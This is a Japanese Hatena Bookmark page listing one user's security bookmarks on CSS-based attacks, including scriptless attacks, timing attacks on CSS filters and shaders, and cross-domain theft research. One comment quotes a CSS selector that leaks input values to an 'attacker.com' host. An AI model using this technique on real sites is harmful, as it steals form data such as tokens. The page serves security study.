[B! css][security] hasegawayosukeのブックマーク

hasegawayosuke id:hasegawayosuke

cssとsecurityに関するhasegawayosukeのブックマーク (8)

[pdf]Cross-origin pixel stealing: Timing attacks using CSS filters
hasegawayosuke 2013/11/07
css filterによってクロスドメインで画像を読み取り。

security

html5

css
リンク
Scriptless Attacks – Stealing the Pie Without Touching the Sill
Scriptless Attacks – Stealing the Pie Without Touching the Sill Mario Heiderich, Marcus Niemietz, Felix Schuster, Thorsten Holz, Jörg Schwenk Horst Görtz Institute for IT-Security Ruhr-University Bochum, Germany {firstname.lastname}@rub.de ABSTRACT Due to their high practical impact, Cross-Site Scripting (XSS) attacks have attracted a lot of attention from the security community members. In the sa
hasegawayosuke 2013/09/16
css

mario

svg

security

html5
リンク
Scriptless Attacks - Stealing the Pie without touching the Sill
Scriptless Attacks - Stealing the Pie without touching the Sill - The document discusses scriptless attacks that can bypass traditional XSS defenses like NoScript and XSS filters by leveraging new HTML5 and CSS features. - It presents several proof-of-concept attacks including using CSS to steal passwords, using SVG fonts to brute force CSRF tokens, and using custom fonts to leak sensitive informa
hasegawayosuke 2013/09/16
css

mario

html5

security

svg
リンク
[PPT] The Sexy Assassin - Tactical Exploitation using CSS
hasegawayosuke 2011/12/21
いろいろアレだ…。input[value*=“\x10”]{ background:url(“//attacker.com/?h=\x10”); } とか頭いい！

css

xss

security
リンク
https://html5sec.org/webkit/test
hasegawayosuke 2011/12/21
"How to analyze HTML/XML attribute values with CSS (Webkit only) http://bit.ly/tu6yTF // PoC" https://twitter.com/#!/0x6D6172696F/status/149405649661464577

css

svg

security

html5
リンク
Timing Attacks on CSS Shaders
CSS Shaders is a new feature folks from Adobe, Apple, and Opera have proposed to the W3C CSS-SVG Effects Task Force. Rather than being limited to pre-canned effects, such as gradients and drop shadows, CSS Shaders would let web developers apply arbitrary OpenGL shaders to their content. That makes for some really impressive demos. Unfortunately, CSS Shaders has a security probl em. To understand
hasegawayosuke 2011/12/14
security

was

css
リンク
CSS - The Sexy Assassin
The Sexy Assassin's Arsenal - Power optimized Concussion sticks (PoCs) Arithmetics Sums Multiplications chmod calc CSS Hangman Game CSK1 CSK2 Loops Stopmotion animation 7 segments counter binary counter Mouse tracking CSS Paint CSS Attribute Reading Attribute Reader History Reading CSS History Bool CSS LAN Scanner History Crawler
hasegawayosuke 2011/12/01
css

security
リンク
Generic cross-browser cross-domain theft
Well, here's a nice little gem for the festive season. I like it for a few distinct reasons: It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified. Accordingly, it affected all 5 major browsers. And likely the rest. You can still be a theft victim even with plugins and JavaScript disabled!It's much less serious than it cou
hasegawayosuke 2010/01/04
security

xss

css
リンク
1

お知らせ

もっと読む

公式Twitter

@HatenaBookmark
リリース、障害情報などのサービスのお知らせ
@hatebu
最新の人気エントリーの配信

キーボードショートカット一覧

j次のブックマーク

k前のブックマーク

lあとで読む

eコメント一覧を開く

oページを開く

設定を変更しましたx